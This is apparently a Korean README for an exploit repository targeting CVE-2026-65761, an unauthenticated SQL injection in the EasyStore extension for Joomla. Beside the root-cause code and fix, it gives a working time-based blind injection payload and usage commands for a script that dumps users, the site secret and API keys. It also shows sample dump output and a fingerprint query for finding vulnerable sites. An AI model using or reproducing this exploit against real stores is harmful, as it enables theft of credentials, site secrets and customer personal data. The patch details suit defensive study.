
EasyStore Joomla filter_sortby 방향을 통한 사전 인증 SQL 인젝션 (CVE-2026-65761, CVSS 9.3)
CVE-2026-65761 (CVSS 9.3 Critical)은 JoomShaper의 Joomla용 EasyStore에서 발견된 인증되지 않은 SQL 인젝션으로, ≤ 2.0.1 버전에 영향을 줍니다.
filter_sortby 제품 목록 매개변수는 열(column)과 방향(direction)으로 분리됩니다. 열은 허용 목록(allow-list)으로 검증되지만, 방향은 ASC/DESC 제한 없이 SQL 절에 직접 연결되어 익명 방문자가 임의의 SQL 인젝션을 수행할 수 있습니다.
ORDER BY인증되지 않은 공격자는 전체 Joomla 데이터베이스를 읽을 수 있습니다: 사용자 계정, 비밀번호 해시, 세션 데이터, 사이트 비밀, API 키, 그리고 모든 고객 PII(이름, 이메일, 주소, 전화번호, 구매 내역).
| CVE | CVE-2026-65761 |
| CVSS | 9.3 Critical |
| 영향 버전 | EasyStore ≤ 2.0.1 |
| 수정 버전 | EasyStore 2.0.2 |
| 유형 | SQL 인젝션 (CWE-89) |
| 인증 | 필요 없음 |
| 발견자 | Phil Taylor (mySites.guru) — 2026년 7월 |
FilterHelper.php:741은 ASC/DESC 허용 목록 검사 없이 정렬 방향을 반환합니다:
// Vulnerable (EasyStore 2.0.1)
// FilterHelper.php:741
return [$orderArray[0], strtoupper($orderArray[1])];
// ^^^^^^^^^ No validation — raw value after uppercase
ProductsModel.php:932은 방향을 SQL에 직접 연결합니다:
// ProductsModel.php:932
$query->order($column . ' ' . $direction);
// ^^^^^^^^^ Raw SQL concatenation
동일한 브랜드 및 컬렉션 목록에는 적절한 방향 허용 목록이 있었지만, 제품 목록에는 없었습니다.
// Fixed — FilterHelper.php:741-742
$direction = strtoupper($orderArray[1]);
return [$orderArray[0], in_array($direction, ['ASC', 'DESC']) ? $direction : 'ASC'];
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Allow-list check
// Fixed — ProductsModel.php:918-920 (second validation added)
if (!in_array(strtoupper($direction), ['ASC', 'DESC'])) {
$direction = 'DESC';
}
1. Attacker crafts: filter_sortby=price-ASC,(SELECT SLEEP(5))
└─ splits to: column=price, direction=ASC,(SELECT SLEEP(5))
2. Column "price" passes allow-list check ✅
└─ ['ordering','featured','best_selling','title','price','created']
3. Direction "ASC,(SELECT SLEEP(5))" passes strtoupper()
└─ No ASC/DESC validation in vulnerable version
4. SQL constructed:
ORDER BY min_price ASC,(SELECT SLEEP(5))
└─ Time-based confirmation: 5 second delay
5. Attacker extracts full database via blind SQLi
| 요구 사항 | 세부 사항 |
|---|---|
| EasyStore ≤ 2.0.1 | 취약한 버전이 설치되어 있어야 함 |
| 제품 목록 접근 가능 | index.php?option=com_easystore&view=products |
| 인증 불필요 | 익명으로 동작 |
| MySQL/MariaDB | SLEEP()을 통한 시간 기반 추출 |
git clone https://github.com/shinthink/CVE-2026-65761.git
cd CVE-2026-65761
# No dependencies required — Python stdlib only
# Check vulnerability (non-destructive)
python3 cve_2026_65761.py --url https://target.com --check
# Dump Joomla users (usernames, emails, names)
python3 cve_2026_65761.py --url https://target.com --dump-users
# Full dump (users + site secret + EasyStore config + API keys)
python3 cve_2026_65761.py --url https://target.com --dump-joomla
+=================================================================+
| CVE-2026-65761 — EasyStore Joomla Pre-Auth SQLi Exploit |
+=================================================================+
Target : https://shop.target.com
Plugin : EasyStore ≤ 2.0.1 | Payload: filter_sortby=col-ASC,INJECTION
[STEP 1] Verifying SQL injection (time-based)
[*] SLEEP(5) delay: 5.2s
[+] SQLi confirmed (5.2s)
[STEP 2] Database fingerprint
[Version] 10.11.14-MariaDB
[Database] joomla_db
[User] joomla_user@localhost
[Prefix] jos_
[+] Version : 10.11.14-MariaDB
[+] Database: joomla_db
[+] User : joomla_user@localhost
[+] Prefix : jos_
[STEP 3] Dumping users
[+] Users: 15
USERNAME EMAIL NAME
───────────────────── ─────────────────────────────── ──────────
admin [email protected] Super User
manager [email protected] Store Manager
[STEP 4] Dumping sensitive configuration
[Secret] abc123def456...
[EasyStore] {"paypal_email":"[email protected]"...
[+] Secret: abc123def456...
[+] EasyStore: {"paypal_email":"[email protected]"...
[+] paypal_email: [email protected]
Requests: 1847
| 파일 | 라인 | 문제 |
|---|---|---|
site/src/Helper/FilterHelper.php | 741 | 허용 목록 없이 방향 반환 — strtoupper()만 적용 |
site/src/Model/ProductsModel.php | 932 | $direction을 ORDER BY 절에 직접 연결 |
filter_sortby = <column>-<direction>
Valid columns (allow-list passes):
ordering, featured, best_selling, title, price, created
Direction (no validation):
Injected directly after strtoupper()
→ ASC,(SELECT SLEEP(5))
→ ASC,(SELECT IF((condition),SLEEP(2),0))
| CVE | 유형 | CVSS |
|---|---|---|
| CVE-2026-65759 | 주문 위조 / 결제 조작 | 8.7 |
| CVE-2026-65760 | 인보이스 IDOR (고객 간 데이터 노출) | 9.2 |
| CVE-2026-65761 | SQL 인젝션 (본 익스플로잇) | 9.3 |
body="com_easystore" && body="filter_sortby"
승인된 보안 테스트 및 교육 연구 목적으로만 사용하십시오. 작성자는 오용으로 인한 책임을 지지 않습니다.